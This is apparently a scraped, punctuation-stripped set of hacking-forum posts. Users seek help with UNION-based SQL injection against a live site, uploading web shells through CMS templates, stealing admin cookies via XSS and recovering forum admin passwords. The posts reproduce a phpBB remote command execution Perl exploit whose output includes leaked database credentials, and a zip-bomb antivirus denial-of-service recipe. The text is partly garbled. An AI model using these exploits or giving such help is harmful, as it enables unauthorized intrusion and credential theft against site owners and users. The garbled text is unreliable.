hi therei discovered an exploitable site the url looks like this query gets executed select from sometable where somecolumn like asdf i tried to use a union select i know the column count of sometable but the php script splits the input by commas probably using explode so if i enter search abc this query is executed select from sometable where somecolumn like a and somecolumn like b and somecolumn like c can anybody please help me how to use a union select here thanks in advancetomm.
there are tools for this my favorite is tried this tool about minutes ago on my home pc against vmware test guest both winxp pro and result was perfect so if you will use that utility properly then it s not likely that you will get caught unless there is some packet logger or ids running.
try to follow this procedure for mssql hereand this for the cheat sheet of command for different db heresorry for my bad englis.
hi it was proving new bug of phpbb faq and i used the example in i have put it of this form.
the full path disclousure its a minor security glitch and this info can help the attacker to visualize his target more better and some cases the attacker uses the information to guest the name of the file or zone to get the special zone of admins in simply way just say were is the website or in what directory is grettings from mexic.
to my journals after some serious confusion about where to put this i decided to add it to my journal lols it will be up as soon as i find a decent file server bye for now peeps dont forget about the auth.
if thats the one your talking about well i said i dont have the time or resources i m on a mhz laptop its just no fun with out my pc back home in nz usr bin perluse io socket phpbb remote commands exec exploit based on succesfully tested on example he he he read the third issue search highlighting has been checked by us several times and we can do nothing with it at all again that particular group admit likewise in a future release of x we will eliminate the problem once and for all but as noted it cannot to our knowledge and as noted testing be taken advantage of and thus is not considered by us to be cause for an immediate release heh r phpbb pl phpbb com phpbb ls la cmd ls la total drwxr xr x dhn phpbb oct drwxrwxr x root phpbb nov drwxr xr x dhn phpbb oct cvs drwxr xr x dhn phpbb jul admin drwxrwxrwx dhn phpbb aug cache rw r r dhn phpbb mar catdb php rw r r dhn phpbb jul common php rw r r root root jul config php drwxr xr x dhn phpbb jun db drwxr xr x dhn phpbb jul docs rw r r dhn phpbb oct extension inc rw r r dhn phpbb jul faq php drwxr xr x dhn phpbb aug files rw r r dhn phpbb jul groupcp php drwxr xr x dhn phpbb aug images drwxr xr x dhn phpbb jul includes rw r r dhn phpbb jul index php drwxr xr x dhn phpbb sep language rw r r dhn phpbb jul login php rw r r dhn phpbb mar memberlist php rw r r dhn phpbb jul modcp php rw r r dhn phpbb mar mods manager php rw r r dhn phpbb jul posting php rw r r dhn phpbb jul privmsg php rw r r dhn phpbb jul profile php rw r r dhn phpbb oct rules php rw r r dhn phpbb jul search php drwxr xr x dhn phpbb jun templates rw r r dhn phpbb mar viewforum php rw r r dhn phpbb jul viewonline php rw r r dhn phpbb jul viewtopic php r phpbb pl phpbb com phpbb cat config php cmd cat config php dbms mysql dbhost localhost dbname phpbb dbuser phpbb dbpasswd phpbb r cks table prefix phpbb p s this code public after phpbb com was defaced by really stupid man with nickname tristam fucking lamaz ccteam ru dbname ccteam phpbb dbuser ccteam userphpbb dbpasswd xcbrsoy eat this dude if argv print q phpbb remote command execution exploitby rush security team rst void ru usage r phpbb pl url dir num cmd params url server url e g phpbb com dir directory where phpbb installed e g phpbb or num number of existing topic cmd command for execute e g ls or ls la exit serv argv dir argv topic argv cmd argv serv s cmd cmd r n print r n cmd s eg cmd s uc sprintf x ord eg topic s uc sprintf x ord eg path dir path viewtopic php t path topic path rush f f f b path cmd path b f f e f path highlight f f b d socket io socket inet new proto tcp peeraddr serv peerport die connect failed r n print socket get path socket host serv n print socket accept n print socket connection close n n on while answer socket if answer end print r n exit if on print answer if answer start on print exploit failed r n print r n eof.
maybe you don t have file privileges.
im new to rfi so excuse my noobnessis this exploitable.
good information about oracle sql injection also i suggest to test things localhost for encoding it s possible to use chr function in oracle example user accounts will be.
can one explain what is so bad for webmasters about xss so you can change the title of a webpage for example big deal i m sure that s not a very good example but please give me an example that makes me scared of xss as being a webmaster.
badrh salam i see that you re trying again perhaps you have to think more than more before to continue see you later.
ok i ve just installed this board i m trying to upload a shell from templates there is the list of templates and the button modify templates then you find the html code just copy and paste your shell like joomla templates and the find the right path of original template haven t you try this way if this doesn t work i try to find another way from the cms code try to create e new group of template and then add a template i succesfully upload my shell but the extension is tpl and then there is a problem to read my shell s file i m trying.
hey when i d.
there are no silent ways and acunetix doesnt list directorys what acunetix does is indexing through the website and searching for jpg js files lets say that have path for example at so the structure of the site issite com imagefolder if you have for example an empty index htm file at imagefolder that directory cannot be listed but you can say that is exists or you can play with the htaccess file as wellyou can create a htacess file in your directory and add the following parameter in it indexignore or if you want to hide specific extensions indexignore gif jpg this will allow listin of html and other files beside gif and jp.
ok as i understand i need to insert this code in to a we.
multiple antivirus scanners dos attackjejejej d s attack your victim combining social engineer and this file his victim is exposed to an attack vulnerable products only tested on norton antivirus norton antivirus mcafee virusscan network associates mcafee virusscan enterprise pc cillin norton av corporate ed version protector plus macafee uvscan scan for linux rav antivirus online scanner couldn t complete the scan windows xp default zip manager report s wrong size of compress zip files there has been multiple reports panda antivirus drweb v are vulnerable details while having a manual scan of compressed files several antivirus trojan spy ware scanners suffer a dos attack if the software tries to completely extract the archive and scan its content for a hostile file moreover if you download such archives from an internet location or copy paste such files from a destination those vulnerable antivirus software s with their auto protect engines active may also trigger a dos an attacker can create a big filedd if dev zero of crash bs and compress the file well there are ways to squeeze a terabyte of such data to few kilobytes an attacker could construct such archive and if send to a vulnerable av gateway multiple of times may result in system un stability high cpu use for long time system hang crash etc note this is just a simple proof of concept smaller archive kb can be created that contain a terabyte of data moreover it s not safe to set automatically quarantine delete option set for your av scanner as it may try to quarantine the virus by extracting the archive direct download sosvulnerable com ar down test zip spanish version sosvulnerable com a.
can you give a link to download that tar file.
we will whait some advanced user to give oppinion also waraxei know that is hard but its good to talk abouth these theme and lear.
yeah i need that to i tryed find mysql vulnerablityes in sites they i get this microsoft jet databasee but i think its older than mssql cy.
you get a linux system or cygwin and type man gcc in the shell.
no it doesn t even create logger txt file the result is shown in the browser as it managed to create the logger txt file but inside were just this lines i don t get any kind of error eitheris snitz forum secure as is not shown in your forums vulnerable lis.
sometime to exploit we have problem with char ascii i found this tool maybe make easy when attackand lastest versionthis tool is beta version maby don t works link must works when you run error on i.
my question is after xss i don t get cookie logged in a file but it is showed in address bar instead where do i get wrongthank.
i saw that the released exploits didn t work this proof of concept do the job problem of previous exploit on the t variable was that the single value was used in multiple queries the one i found is on this piece of code in post php mercury original code if s reply isset this get qu query this db fetch select p post text m user name from this pre posts p this pre users m where p post id this get qu and p post author m user id mercury original code the nice thing is that injecting the q value permits to see data directly on the form metween quotes notes version is already patched against this zeeloc.
in phpnuke index phphere is my solution checkurl server request uri if preg match admin checkurl preg match admin checkurl preg match user checkurl preg match user checkurl preg match checkurl preg match id checkurl preg match id checkurl echo die exit hope it help.
ah no thx sqli it s my field i really like it and exploiting it it s such fu.
plz help me find security libya libya nfsl libya alhora akhbar libya com b.
i doubt he has physical access to the server i used this found out these ports where open port ftp port smtp port pop port mysql.
darkf rc this is php xploit we write how to use php xploit s times here in forum.
hi example on a phpnuke page you can steal the cookie from the admin in this cookie is the password hash includet with this hash you can manipulate an own cookie and login as admin on this site sorry for my bad english i think waraxe can it better describ.
hello there for the past few hours i ve been trying to retrieve an admin s password from a ipb forum it s ver finali ve been using this code.
if that page is prepared but it does not go i don t know the reason can give me an example for this bug if there are thank.
lots and lots of methods and variations tons of whitepapers tutorials books and readmes sit down relax have some beer and start reading something for start from pentester s point of view.
you shuld read some article about sql injecion with information shem.
i have allready given details about this method many times example it and if you still have problems let me know.
a.
thankx warax.
interesting i get the same thing with this perhaps one of the sploitmasters round these parts will be able to take a look at this me looks for waraxe linix et.
checking for sql injection involves auditing your web applications and the best way to do it is by using automated sql injection scanners we ve compiled a list of free sql injection scanners we believe will be of a value to both web application developers and professional security auditors here have publics sql injection scanner.
oh thank you very much i have the admin username and md s hash do you have any advisories or manuals where you explain how can i construct phpnuke admin s cookies thanks in advanc.
probably not possible with that exploi.
you have admin privileges on ipb can you upload files or modify templates or in some other way manipulate files on server.
